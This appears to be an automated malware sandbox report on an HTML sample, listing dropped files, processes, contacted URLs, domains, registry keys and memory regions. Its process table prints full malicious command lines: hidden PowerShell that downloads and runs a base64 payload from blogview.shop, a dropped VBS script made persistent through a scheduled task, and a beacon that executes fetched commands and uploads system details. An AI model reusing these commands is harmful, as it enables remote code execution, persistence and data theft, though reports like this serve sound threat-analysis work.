Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
g3Wg5cdIcT.html
|
HTML document, ASCII text, with very long lines (2215)
|
initial sample
|
 |
|
|
C:\Users\Public\Libraries\Libraries.vbs
|
ASCII text, with very long lines (836), with CRLF, LF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\jq2oycxc.wmp\748-929-24.html.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, ctime=Tue Oct 8
16:06:29 2024, mtime=Tue Oct 8 16:06:29 2024, atime=Tue Oct 8 16:06:29 2024, length=0, window=hide
|
dropped
|
|
|
|
C:\Users\user\Downloads\748-929-24.zip (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
|
|
|
C:\Users\user\Downloads\c4304711-3ea8-4580-ab60-ae16aaf251fc.tmp
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zg3c05e.2tr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15bodsd4.nq2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xhss2ks.emt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cbhr0pw.qe1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj02asfh.g5a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgzycyvt.o3g.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw0hrqt0.s5j.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2beratc.0am.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4lx35yt.4zg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmqeati5.3vy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\unarchiver.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7819850dd61b8837.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W3QD8SYL8HN7KD3WNSSD.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Oct 26 10:48:52 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\Downloads\748-929-24.zip.crdownload (copy)
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
Chrome Cache Entry: 118
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 119
|
Unicode text, UTF-8 text, with very long lines (65468)
|
downloaded
|
||
|
Chrome Cache Entry: 120
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 121
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 122
|
Web Open Font Format (Version 2), TrueType, length 24228, version 3.1245
|
downloaded
|
||
|
Chrome Cache Entry: 123
|
ASCII text, with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 124
|
ASCII text, with very long lines (65536), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 125
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 126
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 127
|
Unicode text, UTF-8 text, with very long lines (65468)
|
dropped
|
||
|
Chrome Cache Entry: 128
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 129
|
Web Open Font Format (Version 2), TrueType, length 23040, version 3.1245
|
downloaded
|
||
|
Chrome Cache Entry: 130
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 131
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 132
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 133
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 134
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 135
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 136
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 137
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 138
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 139
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 140
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 141
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 142
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 143
|
Web Open Font Format (Version 2), TrueType, length 24288, version 3.1245
|
downloaded
|
||
|
Chrome Cache Entry: 144
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 145
|
Web Open Font Format (Version 2), TrueType, length 6428, version 3.1245
|
downloaded
|
||
|
Chrome Cache Entry: 146
|
ASCII text, with very long lines (53473)
|
dropped
|
||
|
Chrome Cache Entry: 147
|
WebAssembly (wasm) binary module version 0x1 (MVP)
|
downloaded
|
||
|
Chrome Cache Entry: 148
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 149
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 150
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
|
Chrome Cache Entry: 151
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 152
|
Web Open Font Format (Version 2), TrueType, length 6572, version 3.1245
|
downloaded
|
||
|
Chrome Cache Entry: 153
|
ASCII text, with very long lines (53473)
|
downloaded
|
||
|
Chrome Cache Entry: 154
|
HTML document, Unicode text, UTF-8 text, with very long lines (5923), with no line terminators
|
downloaded
|
||
|
Chrome Cache Entry: 155
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 156
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 157
|
SVG Scalable Vector Graphics image
|
downloaded
|
||
|
Chrome Cache Entry: 158
|
Web Open Font Format (Version 2), TrueType, length 6532, version 3.1245
|
downloaded
|
||
|
Chrome Cache Entry: 159
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 160
|
SVG Scalable Vector Graphics image
|
dropped
|
||
|
Chrome Cache Entry: 161
|
WebAssembly (wasm) binary module version 0x1 (MVP)
|
dropped
|
||
|
Chrome Cache Entry: 162
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
downloaded
|
||
|
Chrome Cache Entry: 163
|
Web Open Font Format (Version 2), TrueType, length 6172, version 3.1245
|
downloaded
|
There are 63 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\g3Wg5cdIcT.html"
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1980,i,9620083289215155752,12996393152971919094,262144
/prefetch:8
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jq2oycxc.wmp\748-929-24.html.lnk"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell.exe -w hidden -nop -noni -exec bypass -c $w=new-object
system.net.webclient;$d=$w.downloadstring('https://blogview.shop/api/values/view/748-929-24.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\748-929-24.html',
$dd);&$home\appdata\local\temp\748-929-24.html;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9ibG9ndmlldy5zaG9wL2FwaS92YWx1ZXMvMzgzMDM1MjkxNDM0MzgxOTkxNzEvcmVmcmVzaDE5OS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vYmxvZ3ZpZXcuc2hvcC9hcGkvdmFsdWVzL3JlZnJlc2gxOTknLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content
C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3
/tr C:\Users\Public\Libraries\Libraries.vbs /f;
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c =new-object system.net.webclient
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\appdata\local\temp\748-929-24.html
|
|
|
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2000,i,12076860377407532846,4455740521908346531,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs
/f
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://blogview.shop/api/values/38303529143438199171/refresh199/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://blogview.shop/api/values/refresh199',$drpy);}
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
(get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random
-min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://blogview.shop/api/values/38303529143438199171/refresh199/'+$rc);if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX
$jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('https://blogview.shop/api/values/refresh199',$drpy);}
|
|
|
|
C:\Windows\SysWOW64\unarchiver.exe
|
"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\748-929-24.zip"
|
||
|
C:\Windows\SysWOW64\7za.exe
|
"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jq2oycxc.wmp" "C:\Users\user\Downloads\748-929-24.zip"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://blogview.shop/api/values/
|
unknown
|
|
|
|
https://blogview.shop/api/values/38303529143438199171/refresh199/
|
unknown
|
|
|
|
https://blogview.shop/api/values/vi
|
unknown
|
|
|
|
https://blogview.shop/api/values/view/748-929-24.txt
|
unknown
|
|
|
|
https://blogview.sh
|
unknown
|
|
|
|
https://blogview.shop/api/values/refresh199
|
unknown
|
|
|
|
https://blogview.shop
|
unknown
|
|
|
|
https://go.microsoft.co0
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/illustration-design-ece6269f.svg
|
212.42.75.253
|
||
|
https://edisk.ukr.net
|
unknown
|
||
|
http://www.microsoft.coR
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://accounts.ukr.net/login/js/pow-worker-wasm.js?ab3ac7fc
|
212.42.75.253
|
||
|
https://poll0.fwdcdn.com/tunnel/websocket?cv%2Faccounts=login%2F2024.10.14.0820
|
212.42.75.248
|
||
|
https://accounts.ukr.net/api/v1/cai/browser/get
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb
|
|||
|
https://accounts.ukr.net/login/assets/illustration-support-a8ca1214.svg
|
212.42.75.253
|
||
|
http://go.micros
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/illustration-speedy-5282c395.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/illustration-unlimited-8c72d422.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/assembly-vn6BflkY.wasm
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/inter-regular-latin-4X1OBjWa.woff2
|
212.42.75.253
|
||
|
file:///C:/Users/user/appdata/local/temp/748-929-24.html
|
|||
|
https://www.ukr.net/terms/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://accounts.ukr.net/login?client_id=UqGeSNzaWtOnSS6i9Epb&action=login_client
|
212.42.75.253
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/illustration-backup-e81719b8.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/inter-semi-bold-cyrillic-TYsCInMJ.woff2
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/css/bundle.css?3eae8d99
|
212.42.75.253
|
||
|
https://blogview.shop/api/values/38303529143438199171/refresh199/5816370.txt
|
unknown
|
||
|
https://play.google.com/store/apps/details?id=net.ukr.mail
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/illustration-dark-mode-2281edaa.svg
|
212.42.75.253
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/file-20d110f0.svg
|
212.42.75.253
|
||
|
https://mail.ukr.net/terms_$
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/illustration-patriotic-59471166.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/api/v1/token/verification/acquire
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/inter-bold-cyrillic-cOEmsfFa.woff2
|
212.42.75.253
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/illustration-big-files-db9d7440.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/google-play-badge-8c42ddbd.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/favicon.ico
|
212.42.75.253
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://accounts.ukr.net/api/v1/token/analytics/acquire
|
212.42.75.253
|
||
|
https://go.micro
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/app-store-badge-83fca98c.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/illustration-2fa-02329941.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/illustration-markers-828d12d7.svg
|
212.42.75.253
|
||
|
https://accounts.ukr.net/login/assets/illustration-popular-bfc8c819.svg
|
212.42.75.253
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://accounts.ukr.net/login/js/bundle.js?949e9a20
|
212.42.75.253
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/inter-bold-latin-4bgN5WJ1.woff2
|
212.42.75.253
|
||
|
https://www.ukr.net$
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/inter-regular-cyrillic-gDZy7y86.woff2
|
212.42.75.253
|
||
|
http://crl.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://mail.ukr.net/terms_uk.html
|
unknown
|
||
|
https://accounts.ukr.net/login/assets/inter-medium-cyrillic-rEpTbtr3.woff2
|
212.42.75.253
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://edisk.ukr.net/
|
212.42.78.17
|
||
|
https://accounts.ukr.net/login/assets/inter-medium-latin-beJWZ28Q.woff2
|
212.42.75.253
|
There are 57 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
blogview.shop
|
unknown
|
|
|
|
edisk.ukr.net
|
212.42.78.17
|
||
|
accounts.ukr.net
|
212.42.75.253
|
||
|
poll0.fwdcdn.com
|
212.42.75.248
|
||
|
www.google.com
|
172.217.16.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
212.42.75.253
|
accounts.ukr.net
|
Ukraine
|
||
|
192.168.2.8
|
unknown
|
unknown
|
||
|
192.168.2.7
|
unknown
|
unknown
|
||
|
212.42.75.248
|
poll0.fwdcdn.com
|
Ukraine
|
||
|
212.42.78.17
|
edisk.ukr.net
|
Ukraine
|
||
|
192.168.2.5
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
172.217.16.132
|
www.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
19DE464C000
|
heap
|
page read and write
|
|
|
|
289B4631000
|
trusted library allocation
|
page read and write
|
|
|
|
255DA205000
|
heap
|
page read and write
|
|
|
|
289CCD70000
|
heap
|
page read and write
|
|
|
|
19DE45FF000
|
heap
|
page read and write
|
|
|
|
19DE47B5000
|
heap
|
page read and write
|
|
|
|
289B2880000
|
heap
|
page read and write
|
|
|
|
19DE4606000
|
heap
|
page read and write
|
|
|
|
255DA190000
|
heap
|
page read and write
|
|
|
|
289B5CFD000
|
trusted library allocation
|
page read and write
|
|
|
|
255DA1C6000
|
heap
|
page read and write
|
|
|
|
233ADBE0000
|
heap
|
page read and write
|
|
|
|
255DA145000
|
heap
|
page read and write
|
|
|
|
4987000
|
trusted library allocation
|
page read and write
|
|
|
|
4ECF000
|
trusted library allocation
|
page read and write
|
|
|
|
4E8F000
|
stack
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page execute and read and write
|
||
|
3497000
|
heap
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
8985000
|
heap
|
page read and write
|
||
|
19DE60C0000
|
heap
|
page read and write
|
||
|
289B42E3000
|
trusted library allocation
|
page read and write
|
||
|
4C59000
|
trusted library allocation
|
page read and write
|
||
|
233BF5B1000
|
trusted library allocation
|
page read and write
|
||
|
19DE463C000
|
heap
|
page read and write
|
||
|
7FF838980000
|
trusted library allocation
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
2A9E000
|
unkown
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
233C7B95000
|
heap
|
page read and write
|
||
|
7FF8388D0000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
52FF000
|
trusted library allocation
|
page read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
7FF838900000
|
trusted library allocation
|
page execute and read and write
|
||
|
756E000
|
stack
|
page read and write
|
||
|
785E000
|
stack
|
page read and write
|
||
|
233ADCE0000
|
heap
|
page read and write
|
||
|
4C72000
|
trusted library allocation
|
page read and write
|
||
|
289CCD60000
|
heap
|
page read and write
|
||
|
789E000
|
stack
|
page read and write
|
||
|
39D000
|
stack
|
page read and write
|
||
|
88E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
508E000
|
stack
|
page read and write
|
||
|
7FF838940000
|
trusted library allocation
|
page read and write
|
||
|
7FF8388E9000
|
trusted library allocation
|
page read and write
|
||
|
6C20000
|
heap
|
page read and write
|
||
|
233BF5A7000
|
trusted library allocation
|
page read and write
|
||
|
DF7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
2953000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
72DE000
|
stack
|
page read and write
|
||
|
46A0000
|
trusted library allocation
|
page read and write
|
||
|
6F79000
|
heap
|
page read and write
|
||
|
289B43C5000
|
heap
|
page read and write
|
||
|
233ADD60000
|
trusted library allocation
|
page read and write
|
||
|
30C7000
|
stack
|
page read and write
|
||
|
